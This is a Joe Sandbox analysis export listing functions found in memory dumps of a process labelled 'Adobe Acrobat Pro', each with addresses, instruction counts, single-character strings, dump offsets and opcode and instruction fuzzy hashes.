Instruction ID: 4ec5b95f2207dacb877b1b25435ddea3f4aef5848324edca90b95c3163c71bd6
Opcode Fuzzy Hash: ee890d22f87ab5a9ac0505d1dbddd72c065b08946b3bbb98860c1b572b7bab74
Instruction Fuzzy Hash: 1F3199644182D18AC719DF3CA4A04FA77E2DF87312F506A2ED0C9CB9C1C2284509DB01

Uniqueness

Uniqueness Score: -1.00%

Function 1ADBBBC7 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

g, xrefs: 1ADBBCAC

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: g
API String ID: 0-30677878
Opcode ID: 2595f73b89a52b7d692d31b519a304c502b18a0a41f730d7566ff3b8cca3d59f
Instruction ID: 5772dc1e3ee299db0a53f3cfd19723a23044d695937728e32e1d2d16ba9e19a5
Opcode Fuzzy Hash: 2595f73b89a52b7d692d31b519a304c502b18a0a41f730d7566ff3b8cca3d59f
Instruction Fuzzy Hash: 4431062621CB538BD325EB28A4404DBB7E0FECA735FA58B6ED0E2830D1E7296105CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1CF1D56F Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

<, xrefs: 1CF1D5E1

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CF1D000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CF1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cf1d000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 6529fd71f87b6074a4964cdb9d5bc4f56db850b99fbe50041f2eaedcf78afc74
Instruction ID: d56f78b9cf8918515b1a22074a287e0f35d867a7fdb0a48bb5a602534b327991
Opcode Fuzzy Hash: 6529fd71f87b6074a4964cdb9d5bc4f56db850b99fbe50041f2eaedcf78afc74
Instruction Fuzzy Hash: 6621AA292087424BE325DB35D8C00EB73E2EBE0360F54CE7DA88687198EA74901EDF52

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A0C0E Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

$, xrefs: 1B3A0CC5

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: ed35d535c102d8d3d06f9b780126425c6c31d70bbc0a702c84c1df157a2df40d
Instruction ID: 9fd4ef1838dbb719ab6c3cb6112c38364dac2f99b8584a362b4debb6f8113314
Opcode Fuzzy Hash: ed35d535c102d8d3d06f9b780126425c6c31d70bbc0a702c84c1df157a2df40d
Instruction Fuzzy Hash: 6A310B70214B0B8BC724DF28C5414ABB7F1FFCA310F24CA6DD5998B295E334A655CB85

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C6662 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

k, xrefs: 1B3C6676

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: k
API String ID: 0-140662621
Opcode ID: 6dabb6af556bcec91ab84f1a68cbf4f13f0054906d0b1bf6639f6b9cb7b8f10d
Instruction ID: aa9e1e36231458f51e625899d31fd77fa5546626cef5ccf5bc1f5c5d358e814b
Opcode Fuzzy Hash: 6dabb6af556bcec91ab84f1a68cbf4f13f0054906d0b1bf6639f6b9cb7b8f10d
Instruction Fuzzy Hash: 05218C2810C7538BC718DA2DD4900F773F2ABC6361B98EB6EC0A647591DB39540ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A3728 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

a, xrefs: 1B3A375D

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: a
API String ID: 0-3904355907
Opcode ID: ef1f46dd571e1e83e776e3bb0a4ea76390c9376042f04f40a2d109e059c1b37c
Instruction ID: 90401ea31a2f7c905ed8c28fb90c47796f5542e52aee72a247936455724c65ce
Opcode Fuzzy Hash: ef1f46dd571e1e83e776e3bb0a4ea76390c9376042f04f40a2d109e059c1b37c
Instruction Fuzzy Hash: 1B2149761197024BE319DF3898100A7BBD1EBCA358F65CE7C91A2C71C4D734D206CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1CA52000 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

., xrefs: 1CA520C8

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CA4B000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CA4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca4b000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 947e604d1dda9d76a57e25b875a4b01f3432eda53c8f98c06af3af457ca00e61
Instruction ID: 5cc14def3a7dfd4bceb5d98226116e4fcbd7848a4b1317e53011ce68d9a00dd8
Opcode Fuzzy Hash: 947e604d1dda9d76a57e25b875a4b01f3432eda53c8f98c06af3af457ca00e61
Instruction Fuzzy Hash: B831383102CA424BE709FB68D4845ABB3E2FFC2358FA54E6CD0909794AD369905ECF91

Uniqueness

Uniqueness Score: -1.00%

Function 1ADB4B64 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

;, xrefs: 1ADC2036

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: 03e71a23d9be7526cac231ec65b4ac095b628f13fb981a6945b77b9fe296e516
Instruction ID: ab7079964fd5b7d6f68c00978c7b1b49fe2244b5c8aeaa76ff8ea2cdef670356
Opcode Fuzzy Hash: 03e71a23d9be7526cac231ec65b4ac095b628f13fb981a6945b77b9fe296e516
Instruction Fuzzy Hash: 46210876219B028FD31DDF68D48046BB3D1FFC8310BA5893EC585CB118D735A156CA45

Uniqueness

Uniqueness Score: -1.00%

Function 1B398F04 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

}, xrefs: 1B398F69

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: }
API String ID: 0-4239843852
Opcode ID: dc73ecd960281f4c83e4e36878ef3eabba63e0e850ba348effdd527f10a45601
Instruction ID: 09aaab43d091097b327c8912fd4edead31c6ab44c17ce510e243651ebbeb0b1f
Opcode Fuzzy Hash: dc73ecd960281f4c83e4e36878ef3eabba63e0e850ba348effdd527f10a45601
Instruction Fuzzy Hash: FD214631219B124FCB18DB38E5554EBB3E0EBC9350FA0573CA562C72E5DB285018DB06

Uniqueness

Uniqueness Score: -1.00%

Function 1CB06739 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

I, xrefs: 1CB067C4

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CB06000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CB06000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cb06000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 7d0bda2b6a8d85b2e77efe6e9badb94458df87e1484f2742a2facbf85bc9a185
Instruction ID: 6fc2abd22f2cadd644b78a87eb80201bd89bc4638bace55c79dabd752499c43e
Opcode Fuzzy Hash: 7d0bda2b6a8d85b2e77efe6e9badb94458df87e1484f2742a2facbf85bc9a185
Instruction Fuzzy Hash: C2317831114607DFD320DF3CC8446A67391EFC6314F918B7C85558B2C8EBB1A06ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 1CCA1877 Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

&, xrefs: 1CCA18D5

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: &
API String ID: 0-1010288
Opcode ID: 9a4f5d42c02c223991aeb5cdbf50c59fd9150969a09a2d6e1f8586204b58c6b3
Instruction ID: 5bf306b7b18ef8ec1d94faea35c0a8f36afdc15e32e387d95edf9a1f1203d9ec
Opcode Fuzzy Hash: 9a4f5d42c02c223991aeb5cdbf50c59fd9150969a09a2d6e1f8586204b58c6b3
Instruction Fuzzy Hash: 9521353A60821207D32CEB39D8906FBB7E2FBC5324F59C67D80964359ADF3862178A01

Uniqueness

Uniqueness Score: -1.00%

Function 1CC065FB Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

E, xrefs: 1CC066E3

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: c8036f6c3e935f1c1986980cd758649ba22da66cf57fecbdd576b352b56a9955
Instruction ID: 6c06ceac0b2b3198bae393ce5ac18e89212e1f78d5ba5151e8021936971be43b
Opcode Fuzzy Hash: c8036f6c3e935f1c1986980cd758649ba22da66cf57fecbdd576b352b56a9955
Instruction Fuzzy Hash: 712148366087164BD308DE3CE98009AB792EBC5324F20CB2CD581C7294D771956AC789

Uniqueness

Uniqueness Score: -1.00%

Function 1CC0E641 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

C, xrefs: 1CC0E679

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: C
API String ID: 0-1037565863
Opcode ID: 5e98e0e9ec563eaa00c4332abcc69ea3a208562cb742e2c529347790761faf6a
Instruction ID: d04ed7c8f5c9a0228e5124a2555a648a31bf60f8d09f79cd62947c4519ddd627
Opcode Fuzzy Hash: 5e98e0e9ec563eaa00c4332abcc69ea3a208562cb742e2c529347790761faf6a
Instruction Fuzzy Hash: 212148355187518FA715DF29D4504ABB7E2FBC6324BA1CA6DD08286A99CB31510ECF12

Uniqueness

Uniqueness Score: -1.00%

Function 1B39AD01 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

?, xrefs: 1B39AD6F

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: ?
API String ID: 0-1684325040
Opcode ID: 001d1c2efd90cc8c3f950146bdf68e954bf25ed01ccd89f5cec3b6d598c165f5
Instruction ID: 983aacea7e5cc6a3885e5178cdf10ca0f5d45646fef062c8de60257c9a92eee0
Opcode Fuzzy Hash: 001d1c2efd90cc8c3f950146bdf68e954bf25ed01ccd89f5cec3b6d598c165f5
Instruction Fuzzy Hash: A02164792187424BC71DEF35D44446BF7E2DBC6314F24CB3DA0A2CB1A8DB225129CB01

Uniqueness

Uniqueness Score: -1.00%

Function 1ADB4C9C Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

D, xrefs: 1ADB4D53

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 33f647bc4d9a9a716c209d795d39aa89924d2615ae92e4286e49d3fc9aad1086
Instruction ID: f36e74d0166a5795e37b8386441ca3c993c47f1c30fecc6e444b896f9f797685
Opcode Fuzzy Hash: 33f647bc4d9a9a716c209d795d39aa89924d2615ae92e4286e49d3fc9aad1086
Instruction Fuzzy Hash: 9B116A69A086414BD305EF38C4916A6B7C2EFD6324F45DA1CD0D5832D5EB39A848C645

Uniqueness

Uniqueness Score: -1.00%

Function 1CC06666 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

E, xrefs: 1CC066E3

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: 7aa4e376a6c6f4a4cbd348f1a0a0e84f5e3105d20981ec697e22e55bc0f06725
Instruction ID: 6696357c662702aae57ae2767abe5d930cdefec7572ad9004e9b7f44230cd18a
Opcode Fuzzy Hash: 7aa4e376a6c6f4a4cbd348f1a0a0e84f5e3105d20981ec697e22e55bc0f06725
Instruction Fuzzy Hash: 0C2146716087164BC708EF3CD98009BB7D2ABC6314F20CA6CD585C3298D7759526C789

Uniqueness

Uniqueness Score: -1.00%

Function 1B3BB35A Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

p, xrefs: 1B3BB3C5

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: p
API String ID: 0-2181537457
Opcode ID: 70ce7cb9868ae8f86ce6ac8a74076f3f923e0413c83ba8305cdbbabdf6866650
Instruction ID: 522d1a348237a09a9b8fdf2f32b874b5a7eb126597a516fe8d74562f72b5afa0
Opcode Fuzzy Hash: 70ce7cb9868ae8f86ce6ac8a74076f3f923e0413c83ba8305cdbbabdf6866650
Instruction Fuzzy Hash: 3A1133392186174AC710FF38E0815A7F792EFD1314FA4893DC092C70BACA39546ADB81

Uniqueness

Uniqueness Score: -1.00%

Function 1B392B89 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

!, xrefs: 1B392BD2

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: 9cffb796f9fed28336a7c14c3370accd6216502c70c1af9de67e30d0d8122cdf
Instruction ID: 4934bca6ee8d9f581e64238fa3f3c55481e7b04a89c829f2a5e1b1598cca2520
Opcode Fuzzy Hash: 9cffb796f9fed28336a7c14c3370accd6216502c70c1af9de67e30d0d8122cdf
Instruction Fuzzy Hash: C301B12050970146C715DB39A54047777E2AFC2318FA2A77D84EEC74D5E33C910E9F02

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C006D Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

r, xrefs: 1B3C00A6

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 98687c7083f8471baa86e2d630a6b1186c399e41207dc799fcae4e007a04f771
Instruction ID: 5f78f9f7361088a13e0d3ce235beb7502ecfca84b5313fc69bf2067d9b101d3a
Opcode Fuzzy Hash: 98687c7083f8471baa86e2d630a6b1186c399e41207dc799fcae4e007a04f771
Instruction Fuzzy Hash: FBF02825158913CBD31CDF14E9429E6B3E5EFD8305F24872DA49AC32D8E725A431C795

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A6575 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e4c413bfc34968716fde2d158070641dfc0278575b02e45865774ad83d4e21f
Instruction ID: 18659e7003f22e417215af368128d3b9b6000712c80c522051bdd8602a07b240
Opcode Fuzzy Hash: 9e4c413bfc34968716fde2d158070641dfc0278575b02e45865774ad83d4e21f
Instruction Fuzzy Hash: 508185381087918BD318EF39E4900EBB3E2AFC5300FA49A6D94D58B5D5DB39A51ACF42

Uniqueness

Uniqueness Score: -1.00%

Function 1B3B1F44 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9ff0f4cc5b9c971887c9d7f1343ab808ac388a49c9c8fa22f0756d6f18b3947
Instruction ID: e62327c76370b7ccc1fd3edcf483cbc959e359e7d670c567bd0c12da19ee89e8
Opcode Fuzzy Hash: c9ff0f4cc5b9c971887c9d7f1343ab808ac388a49c9c8fa22f0756d6f18b3947
Instruction Fuzzy Hash: 7D51793A1183824ED715DF38E4A14E7B7E2EFD6324F649E6EC0D2C71C5EA25901ADB06

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C812B Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b1738b3b84725f1e29d335eaa6de57e4d552a5fe5e779a92a588bf1feed3b21
Instruction ID: 1d8ca45761e66020f546c733315e7d17b9b42521b0d654c6b62c9e69b9b16f44
Opcode Fuzzy Hash: 8b1738b3b84725f1e29d335eaa6de57e4d552a5fe5e779a92a588bf1feed3b21
Instruction Fuzzy Hash: C85169381097528FD719EF69D8904ABB3D2AFC4300FA4CA7D84918B695DB34A526CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1A75EB6B Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001A73D000.00000020.00000001.01000000.00000004.sdmp, Offset: 1A73D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1a73d000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52dffdca5f0aab611796d3d98aa69e94ed243bac8219973e5e6a093c77313d2f
Instruction ID: 3f168bb42ce51679939aa96387a642c55aff01de13025d7e189ea809c48b19ce
Opcode Fuzzy Hash: 52dffdca5f0aab611796d3d98aa69e94ed243bac8219973e5e6a093c77313d2f
Instruction Fuzzy Hash: 325145315087124BC318DB39C8604AAB7E2EFC9320F60CB7E94A6CB5D9E73594068B81

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A3CF5 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b7f9ddc7e435ff3c0e2a60fa9e24d51fe5c77f8e2910fab082146615d6c80d9
Instruction ID: 5c804a09b6153e5057fc3c70173db9ac34e26f40b44c4e193ba61619da8c2a51
Opcode Fuzzy Hash: 2b7f9ddc7e435ff3c0e2a60fa9e24d51fe5c77f8e2910fab082146615d6c80d9
Instruction Fuzzy Hash: 6B41AC3D1047424BDB24EB38C8A14FE7793ABD5321B10CB6D8496CB6D8DE79B51B9640

Uniqueness

Uniqueness Score: -1.00%

Function 1B3B42D8 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f136dcd55c64a3bd4ab7fa9967e809cadea7899300b19c7218ea05e63ffa85f
Instruction ID: 9944cd4c6223b58b68e049f5a7e51ecee45d8fa2abb7d7736917ede4017ebbbb
Opcode Fuzzy Hash: 7f136dcd55c64a3bd4ab7fa9967e809cadea7899300b19c7218ea05e63ffa85f
Instruction Fuzzy Hash: 8B51027950C7028BD718EF68E4818AAB7E0EFC5364F648A3ED5E1C72D5DB359009CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A90DE Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1cc08a518ce1dfa159daf7e5f7e0b315cd8bc41e5d3678b3b0ca20d5ceb043e
Instruction ID: fbb986130df57f88a3e26a425ff3fb332df5b2122b3a9ba6bf917e628346a862
Opcode Fuzzy Hash: b1cc08a518ce1dfa159daf7e5f7e0b315cd8bc41e5d3678b3b0ca20d5ceb043e
Instruction Fuzzy Hash: 1D5177205086528BC318EA38D4904FBB3E1EFD9325F248ABDD495CB5C5EB79A11ADF01

Uniqueness

Uniqueness Score: -1.00%

Function 1CA4FA1E Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CA4B000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CA4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca4b000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8d3b1a62d3bf2c3c1b04c8131a38d14141ca66c4b305139a2a04fa80f46fa2
Instruction ID: 324ef2b34037b6fa16ec3c578665ccfe3dfe3f26ff094f93d853a9d12dd8f08c
Opcode Fuzzy Hash: 0a8d3b1a62d3bf2c3c1b04c8131a38d14141ca66c4b305139a2a04fa80f46fa2
Instruction Fuzzy Hash: DE416B351087118BE31DEE34E4941EBB7D2EFD4311F25C93DD48A87A85E7389609CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1B39A5B7 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fd5f0ebe631fed5e1ea6dd11ca0149ac801f7cf7c129a09aa2d51a1c6020eae
Instruction ID: 20a1c246873293af6abe4f5f760ebbca4e2699b3f7b6c56b850f1908807a1253
Opcode Fuzzy Hash: 2fd5f0ebe631fed5e1ea6dd11ca0149ac801f7cf7c129a09aa2d51a1c6020eae
Instruction Fuzzy Hash: B85168342042528BE718DB6DE8914EAB3E6FFC5310F69DA3DD482CB1E5DB396506CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1B3B49ED Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f3b628b979d6e9b761a864708b4f9ab5f87ed042912495cfe47bed83641380a
Instruction ID: 55ad390f0572c796d06daec8e1082dc662624a8af1d01245ac9403de20f0c7c0
Opcode Fuzzy Hash: 0f3b628b979d6e9b761a864708b4f9ab5f87ed042912495cfe47bed83641380a
Instruction Fuzzy Hash: D64169350045028BD318DF38D8924EB33A2EFD5364B60D66E8996C76D5E72E951FC704

Uniqueness

Uniqueness Score: -1.00%

Function 1CFAC929 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CFAC000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CFAC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cfac000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93962fcf8b4deac8397d43f16a5dedaa389acca95c792ef3e1969f85ebf25a55
Instruction ID: 7e5d84d4fefc742bf5023917fb6d07eace0aaa75c2c8ca2f3adeaa4a82b43eda
Opcode Fuzzy Hash: 93962fcf8b4deac8397d43f16a5dedaa389acca95c792ef3e1969f85ebf25a55
Instruction Fuzzy Hash: 6A41653A524A164BD319DF68D9804BEB3D2EBC4315B61C73DA993C31A4EB30A90B8B41

Uniqueness

Uniqueness Score: -1.00%

Function 1CFAC990 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CFAC000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CFAC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cfac000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df1929c9b23859dfa948750d772be77932cb51410c55cbcb03d416b8c1354317
Instruction ID: edd8b502196fadb11ca0b1bad8551afc45e81cc16b2b655a283e4b9e703522b7
Opcode Fuzzy Hash: df1929c9b23859dfa948750d772be77932cb51410c55cbcb03d416b8c1354317
Instruction Fuzzy Hash: A741763A514B158FD719DF68D9804AEB3D2EBC4315B61C73D9593C32A4EB30A90B8B41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3B841E Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e681842023453a179ca899e7b88adb9f42676dadf74247499bef23f3d0c852e2
Instruction ID: 59649261fc188399d636ec867a4369e72843a673bc7052030b92d5131d90ec0c
Opcode Fuzzy Hash: e681842023453a179ca899e7b88adb9f42676dadf74247499bef23f3d0c852e2
Instruction Fuzzy Hash: 794177396046058BC709DF7CE4A08EAB3E5FFD4310B649A6CC486C7695EA38A51BCB04

Uniqueness

Uniqueness Score: -1.00%

Function 1AD66164 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001AD5F000.00000020.00000001.01000000.00000004.sdmp, Offset: 1AD5F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ad5f000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a53f46b2a4a076c9b58a83c2f9da54e222ed305c0b6285811a5904836efc04c
Instruction ID: 6480044e78b40dc245739674d6fec18371fb8979d749f0e69679a3f1d6087149
Opcode Fuzzy Hash: 4a53f46b2a4a076c9b58a83c2f9da54e222ed305c0b6285811a5904836efc04c
Instruction Fuzzy Hash: C84129355487628BC305EB2CE4401AE73E5EFD5315FA08A2DC5D2CB2D5E7799427C741

Uniqueness

Uniqueness Score: -1.00%

Function 1B39D75F Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
